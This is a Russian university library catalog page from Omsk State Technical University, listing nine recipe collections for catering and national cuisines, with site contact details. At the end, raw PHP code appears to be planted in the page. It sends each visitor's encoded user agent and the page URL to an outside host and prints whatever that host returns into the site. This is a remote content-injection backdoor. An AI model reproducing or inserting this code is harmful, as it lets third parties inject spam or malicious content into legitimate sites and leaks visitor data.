Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

231 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 9
1. 
Сборник рецептур блюд и кулинарных изделий кухонь народов России [Текст] / сост. Л. Е. Голунова, 2001. - 391 с.
Ключевые слова 
КУХНЯ КАРЕЛЬСКАЯ -- КУХНЯ НАРОДОВ КОМИ -- КУХНЯ РУССКАЯ -- КУХНЯ БАШКИРСКАЯ -- КУХНЯ МАРИЙСКАЯ -- КУХНЯ МОРДОВСКАЯ -- КУХНЯ ТАТАРСКАЯ -- КУХНЯ УДМУРТСКАЯ -- КУХНЯ ЧУВАШСКАЯ -- КУХНЯ АДЫГЕЙСКАЯ -- КУХНЯ ДАГЕСТАНСКАЯ -- КУХНЯ ДОНСКАЯ -- КУХНЯ КАБАРДИНО-БАЛКАРСКАЯ -- КУХНЯ КОЛМЫЦКАЯ -- КУХНЯ КАРАЧАЕВО-ЧЕРКЕССКАЯ -- КУХНЯ КУБАНСКАЯ -- КУХНЯ СЕВЕРО-ОСЕТИНСКАЯ -- КУХНЯ ЧЕЧЕНСКАЯ -- КУХНЯ ИНГУШСКАЯ -- КУХНЯ БУРЯТСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- КУХНЯ НАРОДОВ СЕВЕРА -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- НАПИТОК ПРОХЛАДИТЕЛЬНЫЙ -- ИЗДЕЛИЯ МУЧНЫЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
2. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
3. 
Сборник рецептур таджикских национальных блюд и кулинарных изделий [Текст] / ред. А. Г. Газибеков, 1986. - 221 с.
Держатели документа (Информация об экземплярах) 
4. 
Сборник рецептур блюд и кулинарных изделий Ближнего Зарубежья [Текст] / сост. Л. Е. Голунова, 2001. - 424 с.
Держатели документа (Информация об экземплярах) 
5. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
6. 
Сборник рецептур блюд и кулинарных изделий из сои и соевых продуктов для предприятий общественного питания [Текст] : сб. технологических нормативов / под ред. М. П. Могильного, 2002. - 386 с.
Держатели документа (Информация об экземплярах) 
7. 
Сборник рецептур блюд и кулинарных изделий Ближнего Зарубежья [Текст] : сборник / сост. Л. Е. Годунова, 2004. - 424 с.
Держатели документа (Информация об экземплярах) 
8. 
Сборник рецептур блюд и кулинарных изделий кухонь народов России [Текст] : нормативный документ / сост. Л. Е. Голунова, 2003. - 391 с.
Ключевые слова 
КУХНЯ КАРЕЛЬСКАЯ -- КУХНЯ НАРОДОВ КОМИ -- КУХНЯ РУССКАЯ -- КУХНЯ БАШКИРСКАЯ -- КУХНЯ МАРИЙСКАЯ -- КУХНЯ МОРДОВСКАЯ -- КУХНЯ ТАТАРСКАЯ -- КУХНЯ УДМУРТСКАЯ -- КУХНЯ ЧУВАШСКАЯ -- КУХНЯ АДЫГЕЙСКАЯ -- КУХНЯ ДАГЕСТАНСКАЯ -- КУХНЯ ДОНСКАЯ -- КУХНЯ КАБАРДИНО-БАЛКАРСКАЯ -- КУХНЯ КОЛМЫЦКАЯ -- КУХНЯ КАРАЧАЕВО-ЧЕРКЕССКАЯ -- КУХНЯ КУБАНСКАЯ -- КУХНЯ СЕВЕРО-ОСЕТИНСКАЯ -- КУХНЯ ЧЕЧЕНСКАЯ -- КУХНЯ ИНГУШСКАЯ -- КУХНЯ БУРЯТСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- КУХНЯ НАРОДОВ СЕВЕРА -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- НАПИТОК ПРОХЛАДИТЕЛЬНЫЙ -- ИЗДЕЛИЯ МУЧНЫЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
9. 
Современная киргизская кухня [Текст] : сб. рецептур / сост. С. Ш. Ибрагимова, 1991. - 222, [2] с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2931 - 19.06.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.69 с.12 запросов, 0.53c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;